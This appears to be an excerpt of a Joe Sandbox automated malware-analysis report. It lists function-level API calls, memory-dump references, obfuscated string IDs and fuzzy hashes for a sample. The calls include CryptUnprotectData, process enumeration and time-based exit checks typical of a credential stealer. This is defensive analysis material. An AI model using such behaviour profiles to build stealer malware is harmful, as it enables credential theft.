                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: BinaryCryptLocalString$AllocFree
                          • String ID: NT
                          • API String ID: 4291131564-3872220154
                          • Opcode ID: 292f08fdf4b4d8805c376d937098525a36b7c593564d086cca27324208f1f5a5
                          • Instruction ID: fa5fa80d131fc05bd5f03fd5fac8984afd61c662d84234e1d302f94a3c0d89c4
                          • Opcode Fuzzy Hash: 292f08fdf4b4d8805c376d937098525a36b7c593564d086cca27324208f1f5a5
                          • Instruction Fuzzy Hash: B011AFB4640208BFEB10CF64DC95FAA77B5FB89704F208059FA159B390C7B6A901DBA4
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: )a?T$6'os$;#hN$}&$.!$>?
                          • API String ID: 0-1724863568
                          • Opcode ID: c20440c8c3c9ebc0fbb826686c39424ae996b304b9a6b8891567dab77f4c0503
                          • Instruction ID: d0c0ce590ecbfeb4f062544557540f603cc1181e3057b3d97ca91e307c6d0b08
                          • Opcode Fuzzy Hash: c20440c8c3c9ebc0fbb826686c39424ae996b304b9a6b8891567dab77f4c0503
                          • Instruction Fuzzy Hash: F1825BF3A082149FD3046E2DEC8567AFBE9EF94320F16463DEAC4D7744E63598058693
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: #+;v$#n?O$+p~w$7(9$i)
                          • API String ID: 0-1308280685
                          • Opcode ID: 8c1168a1c4a4315bcd0403600af47914d7329da724e216aae11955794d3de9e4
                          • Instruction ID: b2423f33cd0f524a9b7162b800f9560f4faf7f7cd2d639bedd3e841c4aba94dc
                          • Opcode Fuzzy Hash: 8c1168a1c4a4315bcd0403600af47914d7329da724e216aae11955794d3de9e4
                          • Instruction Fuzzy Hash: F1B2F4F350C2049FE304AF29EC8567AFBE5EF94320F16892DEAC483744EA3599458797
                          APIs
                          • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0054C871
                          • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0054C87C
                          • lstrcat.KERNEL32(?,00560B46), ref: 0054C943
                          • lstrcat.KERNEL32(?,00560B47), ref: 0054C957
                          • lstrcat.KERNEL32(?,00560B4E), ref: 0054C978
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$BinaryCryptStringlstrlen
                          • String ID:
                          • API String ID: 189259977-0
                          • Opcode ID: 9771b9d1cf07c616a6b5e2da44cdfba1ce6e791600867bd1a56466729afb9c71
                          • Instruction ID: 0952f7e63be9a2c22e63d705b46959ee00b5acae080033498fe7a5c5765fb6ae
                          • Opcode Fuzzy Hash: 9771b9d1cf07c616a6b5e2da44cdfba1ce6e791600867bd1a56466729afb9c71
                          • Instruction Fuzzy Hash: 8D41827590420EEFDB50CF90DD89BFEBBB8BB44304F1045A9E509A7280D7745A84CF95
                          APIs
                          • GetSystemTime.KERNEL32(?), ref: 0055696C
                          • sscanf.NTDLL ref: 00556999
                          • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 005569B2
                          • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 005569C0
                          • ExitProcess.KERNEL32 ref: 005569DA
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Time$System$File$ExitProcesssscanf
                          • String ID:
                          • API String ID: 2533653975-0
                          • Opcode ID: 631f077865c53c84a95d299afc5df222136f1d6655a8e7ac22cb7e8695584a02
                          • Instruction ID: 8caf9f43779a9a97a7eb2ede66784a3e42f99cde2df493f9a83766f1fc2f53a4
                          • Opcode Fuzzy Hash: 631f077865c53c84a95d299afc5df222136f1d6655a8e7ac22cb7e8695584a02
                          • Instruction Fuzzy Hash: 97210E75D00209ABDF04EFE4D9559EEBBB5FF48301F14852EE406E3250EB349608CB69
                          APIs
                          • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0054724D
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00547254
                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00547281
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 005472A4
                          • LocalFree.KERNEL32(?), ref: 005472AE
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                          • String ID:
                          • API String ID: 2609814428-0
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0055961E
                          • Process32First.KERNEL32(00560ACA,00000128), ref: 00559632
                          • Process32Next.KERNEL32(00560ACA,00000128), ref: 00559647
                          • StrCmpCA.SHLWAPI(?,00000000), ref: 0055965C
                          • CloseHandle.KERNEL32(00560ACA), ref: 0055967A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                          • String ID:
                          • API String ID: 420147892-0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: (q/$+#I$>^g$C3w%
                          • API String ID: 0-1949164112
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 0-|{$H`S$K4<o$S^F}
                          • API String ID: 0-2203729788
                          APIs
                          • CryptBinaryToStringA.CRYPT32(00000000,00545184,40000001,00000000,00000000,?,00545184), ref: 00558EC0
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: BinaryCryptString
                          • String ID:
                          • API String ID: 80407269-0
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0123F128,00000000,?,00560E10,00000000,?,00000000,00000000), ref: 00557A63
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00557A6A
                          • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0123F128,00000000,?,00560E10,00000000,?,00000000,00000000,?), ref: 00557A7D
                          • wsprintfA.USER32 ref: 00557AB7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                          • String ID:
                          • API String ID: 3317088062-0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: :uG~$P?<$S6n?$u'>
                          • API String ID: 0-599339616
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: URm\$V0H$R/
                          • API String ID: 0-1331272546
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: G#"$'uH$D:{
                          • API String ID: 0-482785387
                          APIs
                          • CoCreateInstance.COMBASE(0055E118,00000000,00000001,0055E108,00000000), ref: 00553758
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 005537B0
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharCreateInstanceMultiWide
                          • String ID:
                          • API String ID: 123533781-0
                          APIs
                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00549B84
                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 00549BA3
                          • LocalFree.KERNEL32(?), ref: 00549BD3
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$AllocCryptDataFreeUnprotect
                          • String ID:
                          • API String ID: 2068576380-0
                          • Opcode ID: 6c6f12953a0d7258563196cabb9a41c060cecc86cbf58d7c8f9a34c3893f011c
                          • Instruction ID: 5f26bb7db2c95d5a81a143916bc89891b0d3d7da05e544f4400c5a5e29833ed5
                          • Opcode Fuzzy Hash: 6c6f12953a0d7258563196cabb9a41c060cecc86cbf58d7c8f9a34c3893f011c
                          • Instruction Fuzzy Hash: FC11CCB4A40209EFDB04DFA4D985EAE77B5FF88300F108599E91597350D774AE10CFA1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: b=$b=
                          • API String ID: 0-796697774
                          • Opcode ID: a1e768003e032484b798cfe17104ddcab1ef201552891cea25c42767fba158f4
                          • Instruction ID: cd18ed3dc74a45ff62c29bcc598d66ba461db4e09f250b58b06623d8952deb16
                          • Opcode Fuzzy Hash: a1e768003e032484b798cfe17104ddcab1ef201552891cea25c42767fba158f4
                          • Instruction Fuzzy Hash: 2951F8F3B186005BE3049A2DEC8577BB7D7EBD4720F1AC53DE68987788E93898058256
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: )Xz_
                          • API String ID: 0-2966789561
                          • Opcode ID: 1a5265cbc28c8fc2b3269aa7c2e869dda07ae2a116f7fb19790271b150d02901
                          • Instruction ID: af1aae0c0086bebbbffa30a57a7c457ec093cb82abb898bc7b9cd73515c190a1
                          • Opcode Fuzzy Hash: 1a5265cbc28c8fc2b3269aa7c2e869dda07ae2a116f7fb19790271b150d02901
                          • Instruction Fuzzy Hash: 397126F3E192149FE3046E29DC4536AF7E6EF94720F1B893DDAC493784EA3918448786
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: *f?o
                          • API String ID: 0-658665761
                          • Opcode ID: 2a1992e0b501e2d9696dbf7b3ba5ade82e19400bc40c5ccf353b46db6ceb5b9e
                          • Instruction ID: 02a28e58dc3a28299c49775efc48df45dcbac1bdf886fe7148b401f1db5460bd
                          • Opcode Fuzzy Hash: 2a1992e0b501e2d9696dbf7b3ba5ade82e19400bc40c5ccf353b46db6ceb5b9e
                          • Instruction Fuzzy Hash: 3731C7F3F4431907F360686AECC8366B6CAABD4320F1F83359A5857BC5ECBA4C014145
                          Memory Dump Source
                          • Source File: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6f7c3e448f1b772a8aec57f349336b43b3c66dd2c31c1a59a5ad1487d1c90d10
                          • Instruction ID: 5cb79baeb14f70d535ad9bbe8e5943aa8fe0fba72dd921a3b266d30b87215b65
                          • Opcode Fuzzy Hash: 6f7c3e448f1b772a8aec57f349336b43b3c66dd2c31c1a59a5ad1487d1c90d10
                          • Instruction Fuzzy Hash: 855128B310C344DFD306BAAA9C4553BB7A5EB50721F368D2DE2CA97240EA795C40A6D3
                          Memory Dump Source
                          • Source File: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ac79982bd3ec0ca5d463d1933108f952d5da7eaf3b26015f63d42d5a4c29618d
                          • Instruction ID: fcc39b1f92fad1c0f9e148b445869a6daba0991111f2351ff8ee18250882e371
                          • Opcode Fuzzy Hash: ac79982bd3ec0ca5d463d1933108f952d5da7eaf3b26015f63d42d5a4c29618d
                          • Instruction Fuzzy Hash: 904129F360C2009FF3046E39ED8577BBBDAEB94320F16463EE6C4C3684E63998058656
                          Memory Dump Source
                          • Source File: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
